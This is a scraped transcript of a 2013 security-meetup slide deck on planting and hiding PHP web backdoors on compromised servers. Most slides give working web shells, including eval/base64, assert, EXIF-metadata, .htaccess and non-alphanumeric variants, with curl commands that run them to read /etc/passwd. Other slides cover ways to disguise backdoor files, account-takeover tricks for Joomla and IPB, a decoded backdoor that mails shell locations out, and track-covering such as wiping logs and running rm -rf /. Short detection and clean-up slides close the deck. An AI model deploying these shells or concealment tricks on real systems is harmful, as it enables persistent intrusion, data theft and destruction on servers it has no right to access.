art of web backdoor - pichaya morimoto
DESCRIPTION
Topic: Art of Web Backdoor Speaker: Pichaya Morimoto Event: 2600 Thailand Meeting #5 Date: September 6, 2013 Video: https://www.youtube.com/watch?v=QIXTPPBfLyITRANSCRIPT
![Page 1: Art of Web Backdoor - Pichaya Morimoto](https://reader031.vdocuments.site/reader031/viewer/2022020116/5589e748d8b42aba1b8b4620/html5/thumbnails/1.jpg)
Art of Web Backdoorstealth ways to hide your ass in pwned box
[email protected]/index.htmlilinkedin.com/in/pich4ya
Pichaya Morimoto
![Page 2: Art of Web Backdoor - Pichaya Morimoto](https://reader031.vdocuments.site/reader031/viewer/2022020116/5589e748d8b42aba1b8b4620/html5/thumbnails/2.jpg)
พระราชบัญญัติ วาดวยการกระทําความผิดเกี่ยวกับคอมพิวเตอร พ.ศ. ๒๕๕๐มาตรา 5 ผูใดเขาถึงโดยมิชอบซึ่งระบบคอมพิวเตอรที่มีมาตรการปองกันการเขาถึงโดยเฉพาะและมาตรการนั้นมิไดมีไวสําหรับตน โทษจําคุกไมเกิน 6 เดือน หรือปรับไมเกิน 10,000 บาทมาตรา 7ผูใดเขาถึงโดยมิชอบซึ่งขอมูลคอมพิวเตอรที่มีมาตรการปองกันการเขาถึงโดยเฉพาะ และมาตรการนั้นมิไดมีไวสําหรับตน โทษจําคุกไมเกิน 2 ป หรือปรับไมเกิน 40,000 บาทมาตรา 9ผูใดทําใหเสียหาย ทําลาย แกไข เปลี่ยนแปลง หรือเพิ่มเติมไมวาทั้งหมดหรือ บางสวน ซึ่งขอมูลคอมพิวเตอรของผูอื่นโดยมิชอบโทษจําคุกไมเกิน 5 ป หรือปรับไมเกิน 100,000 บาท
Legal Warning
![Page 3: Art of Web Backdoor - Pichaya Morimoto](https://reader031.vdocuments.site/reader031/viewer/2022020116/5589e748d8b42aba1b8b4620/html5/thumbnails/3.jpg)
★ Anatomy of (PHP) Web Hacking★ Maintaining Access ★ Techniques★ Covering Tracks★ Case Studies★ Detect / Clean up
Overview
![Page 4: Art of Web Backdoor - Pichaya Morimoto](https://reader031.vdocuments.site/reader031/viewer/2022020116/5589e748d8b42aba1b8b4620/html5/thumbnails/4.jpg)
OWASP Top Ten 2013
A1-InjectionA2-Broken Authentication and Session ManagementA3-Cross-Site Scripting (XSS)A4-Insecure Direct Object ReferencesA5-Security MisconfigurationA6-Sensitive Data ExposureA7-Missing Function Level Access ControlA8-Cross-Site Request Forgery (CSRF)A9-Using Components with Known VulnerabilitiesA10-Unvalidated Redirects and Forwards
How we put web backdoor?
High Risk
Medium Risk
Low Risk
![Page 5: Art of Web Backdoor - Pichaya Morimoto](https://reader031.vdocuments.site/reader031/viewer/2022020116/5589e748d8b42aba1b8b4620/html5/thumbnails/5.jpg)
Public CMS/Plugins PWN
1. Vulnerability Assessment and Mapping ★ Vulnerable version ? Vulnerability exists ?★ Conditions match ? / Known limitations2. Exploitation★ Public exploit available?2.1 Yes - Just use it ★ Review & test2.2 No - Source code analysis★ Patch file (.diff) / $ diff -ENwbur vul-src/ patched-src/★ Issue tracker (SVN/GIT repo.)★ Public / private vulnerability discussion3. Zero-Day - for l33t h4x0r!★ Source code analysis without patch, valuable!
![Page 6: Art of Web Backdoor - Pichaya Morimoto](https://reader031.vdocuments.site/reader031/viewer/2022020116/5589e748d8b42aba1b8b4620/html5/thumbnails/6.jpg)
Affected Versions: 2.5.x <= 2.5.13 and 3.x <= 3.1.4 Fixed Date: 2013-July-31 (2.5.14, 3.1.5)
Joomla! - Unauthorised Uploads
Vulnerable files1. libraries/joomla/filesystem/file.php2. administrator/components/com_media/helpers/media.php
Scenario1. Joomla! <= 2.5.132. User with author privilege3. OS = Windows Machineor misconfigured Apache + Linux
Bypassing File Upload Restrictions in Joomla!
![Page 7: Art of Web Backdoor - Pichaya Morimoto](https://reader031.vdocuments.site/reader031/viewer/2022020116/5589e748d8b42aba1b8b4620/html5/thumbnails/7.jpg)
Known Issues or Limitations
![Page 8: Art of Web Backdoor - Pichaya Morimoto](https://reader031.vdocuments.site/reader031/viewer/2022020116/5589e748d8b42aba1b8b4620/html5/thumbnails/8.jpg)
Backdoor is a Feature for Admin!
![Page 9: Art of Web Backdoor - Pichaya Morimoto](https://reader031.vdocuments.site/reader031/viewer/2022020116/5589e748d8b42aba1b8b4620/html5/thumbnails/9.jpg)
Also in IPB, SMF, vBulletin
![Page 10: Art of Web Backdoor - Pichaya Morimoto](https://reader031.vdocuments.site/reader031/viewer/2022020116/5589e748d8b42aba1b8b4620/html5/thumbnails/10.jpg)
Latest vBulletin 5.0.4 - PHP Module
![Page 11: Art of Web Backdoor - Pichaya Morimoto](https://reader031.vdocuments.site/reader031/viewer/2022020116/5589e748d8b42aba1b8b4620/html5/thumbnails/11.jpg)
http://www.ubuntuforums.org/ ★ Hacked on 14 July 2013, Defaced on 20 July 2013★ 1.82 million users’ data leaked★ Attacker had full access on Forums app servers★ Servers running latest version of vBulletin
Case Study - Official Ubuntu Forums
What happened (posted in Canonical Blog)
● A moderator account was hacked● Attacker post XSS to forum and sent to admin ● 31 seconds .. admin account was PWNED
![Page 12: Art of Web Backdoor - Pichaya Morimoto](https://reader031.vdocuments.site/reader031/viewer/2022020116/5589e748d8b42aba1b8b4620/html5/thumbnails/12.jpg)
Invision Power Board <= 3.4.4Released on : 2013/05/13 by @johnjeanLogical Vulnerability + Bad Sanitization
1. Create new user using [email protected]+[150 spaces]+A
2. MySQL Limitation!string exceeding 150 characters are truncatedand value will be trim to cause arbitrary userhave same email as admin and change admin pass!
IPB - Bad Sanitization
![Page 13: Art of Web Backdoor - Pichaya Morimoto](https://reader031.vdocuments.site/reader031/viewer/2022020116/5589e748d8b42aba1b8b4620/html5/thumbnails/13.jpg)
3rd party components★ uploadify, ckeditor, ckfinder, tinymce, openx
Shared Hosting Security★ Exposed Session Data★ Improper user privileges(OS/Code execution, critical file manipulation)★ Vulnerable services (SSH, FTP etc.)
MITM, Insider attack, lack of physical access control etc.
Other factors
![Page 14: Art of Web Backdoor - Pichaya Morimoto](https://reader031.vdocuments.site/reader031/viewer/2022020116/5589e748d8b42aba1b8b4620/html5/thumbnails/14.jpg)
Add arbitrary accounts (*nix shadow, AD etc.)Reverse Shell and/or Bind Shell using ...
★ Binary/Script Backdoor 1. Bind Port to *nix shell2. Send *nix shell back to attacker3. Make a relay tunnel4. Hidden trigger to spawn shell
★ Web Backdoor - Use less privileged!Connect via HTTP Methods & Headers (GET/POST etc.)
Maintaining Access
![Page 15: Art of Web Backdoor - Pichaya Morimoto](https://reader031.vdocuments.site/reader031/viewer/2022020116/5589e748d8b42aba1b8b4620/html5/thumbnails/15.jpg)
<?php
if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die();}
?>
Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
$ curl -d “cat+/etc/passwd” http://target.com/simple-backdoor.php
Simple PHP Backdoor
![Page 16: Art of Web Backdoor - Pichaya Morimoto](https://reader031.vdocuments.site/reader031/viewer/2022020116/5589e748d8b42aba1b8b4620/html5/thumbnails/16.jpg)
Hide your ASS
![Page 17: Art of Web Backdoor - Pichaya Morimoto](https://reader031.vdocuments.site/reader031/viewer/2022020116/5589e748d8b42aba1b8b4620/html5/thumbnails/17.jpg)
Passing variables to PHP global vars:
$_GET$_POST$_COOKIE$_REQUEST$_SERVER[‘HTTP_CMD’]
Communication
$ curl -A- -vvv 127.0.0.1/test1.php -H "Accept_Encoding: @system('uname -a;ps -aux');"
![Page 18: Art of Web Backdoor - Pichaya Morimoto](https://reader031.vdocuments.site/reader031/viewer/2022020116/5589e748d8b42aba1b8b4620/html5/thumbnails/18.jpg)
1. Encode (Attacker Client)$ php -r "echo base64_encode(gzdeflate('system(\"id\")'));"K64sLknN1VDKTFHSBAA=
2. Send (Attacker Client)$ curl -A- -vvv 127.0.0.1/test3.php -d "cmd=K64sLknN1VDKTFHSBAA="
3. Decode (PHP Backdoor)
@eval(gzinflate(base64_decode($_POST[“cmd”])));
4. Outputuid=33(www-data) gid=33(www-data) groups=33(www-data)
base64_decode() + gzinflate()
![Page 19: Art of Web Backdoor - Pichaya Morimoto](https://reader031.vdocuments.site/reader031/viewer/2022020116/5589e748d8b42aba1b8b4620/html5/thumbnails/19.jpg)
1. assert()
assert('sys' . 'tem('.$_POST["cmd"].')');
$ curl -A- -vvv http://target/evil.php -d "cmd='ls -lha'"
2. preg_replace() with -e modifier (deprecated in PHP 5.5.0)
preg_replace('/(.*)/e', base64_decode($_POST["cmd"]), '' );
$ curl -A- -vvv http://target/evil.php -d "cmd=c3lzdGVtKCdpZCcp"
3. And many more, e.g. OS command executions , check out this link!http://stackoverflow.com/questions/3115559/exploitable-php-functions
Code Evaluation besides eval()
![Page 20: Art of Web Backdoor - Pichaya Morimoto](https://reader031.vdocuments.site/reader031/viewer/2022020116/5589e748d8b42aba1b8b4620/html5/thumbnails/20.jpg)
★ GNU license in beginning of a PHP file!
/* Copyright (C) 1991 Free Software Foundation, Inc.This file is part of the GNU C Library.… */ <?php ...
★ PGP Public Key !?
/* -----BEGIN PGP PUBLIC KEY BLOCK----- Version: GnuPG v1.4.10 (GNU/Linux) ... */ <?php …
★ Software license PROHIBIT to decode
Stupid trick! but it’s work!
★ More creative filename!
○ lndex.php○ 1ndex.php○ index2.php○ wp-manual.php○ cat.jpg.php○ license.txt ○ README.md○ .bash_profile
![Page 21: Art of Web Backdoor - Pichaya Morimoto](https://reader031.vdocuments.site/reader031/viewer/2022020116/5589e748d8b42aba1b8b4620/html5/thumbnails/21.jpg)
1. Create exif meta-data using exiftool
$ exiftool 2600.jpg -Software=system$ exiftool 2600.jpg -Model=id
2. Put 2600.jpg along with backdoor
$A = exif_read_data('2600.jpg');$A['Software']($A['Model']);
3. Browse to backdoor and boom!uid=33(www-data) gid=33(www-data) groups=33(www-data)
PHP: exif_read_data()
![Page 22: Art of Web Backdoor - Pichaya Morimoto](https://reader031.vdocuments.site/reader031/viewer/2022020116/5589e748d8b42aba1b8b4620/html5/thumbnails/22.jpg)
1. Apache Configuration
AllowOverride All
2. .htaccess
<FilesMatch "2600.jpg">SetHandler application/x-httpd-php</FilesMatch>
3. 2600.jpg<?php @system($_POST["cmd"]); ?>
.htaccess + any file format
![Page 23: Art of Web Backdoor - Pichaya Morimoto](https://reader031.vdocuments.site/reader031/viewer/2022020116/5589e748d8b42aba1b8b4620/html5/thumbnails/23.jpg)
<?@$_POST[0]($_POST[1])?>$ curl -A- "http://target/backdoor.php" -d "0=system&1=uname+-a"
one statement PHP backdoor
![Page 24: Art of Web Backdoor - Pichaya Morimoto](https://reader031.vdocuments.site/reader031/viewer/2022020116/5589e748d8b42aba1b8b4620/html5/thumbnails/24.jpg)
Binary Code in PHP Shell
![Page 25: Art of Web Backdoor - Pichaya Morimoto](https://reader031.vdocuments.site/reader031/viewer/2022020116/5589e748d8b42aba1b8b4620/html5/thumbnails/25.jpg)
Binary Code in PHP Shell
![Page 26: Art of Web Backdoor - Pichaya Morimoto](https://reader031.vdocuments.site/reader031/viewer/2022020116/5589e748d8b42aba1b8b4620/html5/thumbnails/26.jpg)
<?$_="";$_[+""]='';$_="$_"."";
$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");?>
<?=${'_'.$_}['_'](${'_'.$_}['__']);?>
$ curl "http://target/backdoor.php?_=shell_exec&__=uname+-a"
*** This code contains non-printable characters, it might not work if you copy & paste! ***
non-alphabet PHP shell
![Page 27: Art of Web Backdoor - Pichaya Morimoto](https://reader031.vdocuments.site/reader031/viewer/2022020116/5589e748d8b42aba1b8b4620/html5/thumbnails/27.jpg)
work for various type of OS (win/linux/osx ) and ISO ??find writable directoryread/write filemerge into every filesmerge into backup db / files / zipreverse/bind php shelldatabase clientFile management (symlink?)av/ids/ips/waf detect credential dumperos commandnetwork scannerTCP/UDP/HTTP/DNS Amp flood SOCKS Proxy for pivotingHTTP proxy, IRC connect backetc.
Common survivor feature!
![Page 28: Art of Web Backdoor - Pichaya Morimoto](https://reader031.vdocuments.site/reader031/viewer/2022020116/5589e748d8b42aba1b8b4620/html5/thumbnails/28.jpg)
Exploit Pack
![Page 29: Art of Web Backdoor - Pichaya Morimoto](https://reader031.vdocuments.site/reader031/viewer/2022020116/5589e748d8b42aba1b8b4620/html5/thumbnails/29.jpg)
c99r57wsoicfdkshellweevelyASPshmsfpayload use at your own risk!
Free Kiddies Backdoor!
Caution!There are many cases that backdoor served inside another backdoor *w*)ae.g. http://packetstormsecurity.com/files/download/117974/wso2.5.1.zip
$x10="\x6dai\154";$x0b=$_SERVER["\x53\x45RVE\122_\x4eAM\x45"].$_SERVER["\123\103\x52I\x50\x54_\116\101\115E"];$x0c="\141r\162a\171\040".$x0b;$x0d=array("\143\x61","\x6c\x69","\146\x77\162\151\x74\x65","\100","v\x65\x2e");$x0e=$x0d[2].$x0d[3].$x0d[1].$x0d[4].$x0d[0];$x0f=@$x10($x0e,$x0c,$x0b);
Decoded:
mail(“[email protected]”,”target/backdoor.php”,”target/backdoor.php”);
![Page 30: Art of Web Backdoor - Pichaya Morimoto](https://reader031.vdocuments.site/reader031/viewer/2022020116/5589e748d8b42aba1b8b4620/html5/thumbnails/30.jpg)
★ root?★ logs e.g. /var/log/*★ history e.g. ~/.bash_history★ self-destruction★ rm -rf /
Covering Tracks
![Page 31: Art of Web Backdoor - Pichaya Morimoto](https://reader031.vdocuments.site/reader031/viewer/2022020116/5589e748d8b42aba1b8b4620/html5/thumbnails/31.jpg)
★ Follow secure coding guideline★ Security hardening checklists★ Critical File Integrity Monitoring★ VA / Pentest by certified guys★ Patch Management & Patch Auditing★ Centralized Log & WAF?
$ iptables -A OUTPUT -m string --algo bm --string 'FilesMan' -j DROP
Detect / Prevent
![Page 32: Art of Web Backdoor - Pichaya Morimoto](https://reader031.vdocuments.site/reader031/viewer/2022020116/5589e748d8b42aba1b8b4620/html5/thumbnails/32.jpg)
var_dump(in_array('mod_security2', apache_get_modules ()));print_r(apache_get_modules());
MOD_Security ?
![Page 33: Art of Web Backdoor - Pichaya Morimoto](https://reader031.vdocuments.site/reader031/viewer/2022020116/5589e748d8b42aba1b8b4620/html5/thumbnails/33.jpg)
1. Change/reset passwords2. Review log files3. Hunting vulnerable apps/backdoors4. Backup || Recovery
$ grep - common danger functions$ find ★ newly created files ★ certain conditions (time/date/permission)
Clean up
![Page 34: Art of Web Backdoor - Pichaya Morimoto](https://reader031.vdocuments.site/reader031/viewer/2022020116/5589e748d8b42aba1b8b4620/html5/thumbnails/34.jpg)
Capture The Flaghttps://ctftime.org/Online challengeshttp://www.root-me.org/en/Challenges/http://wargame2k10.nuitduhack.com/http://captf.com/practice-ctf/http://www.overthewire.org/wargames/natas/http://www.modsecurity.org/demo/
VM Labshttp://blog.g0tmi1k.com/2011/03/vulnerable-by-design.htmlhttps://pentesterlab.com/exercises/http://vulnhub.com/
Practical Hacking?
Thanks You !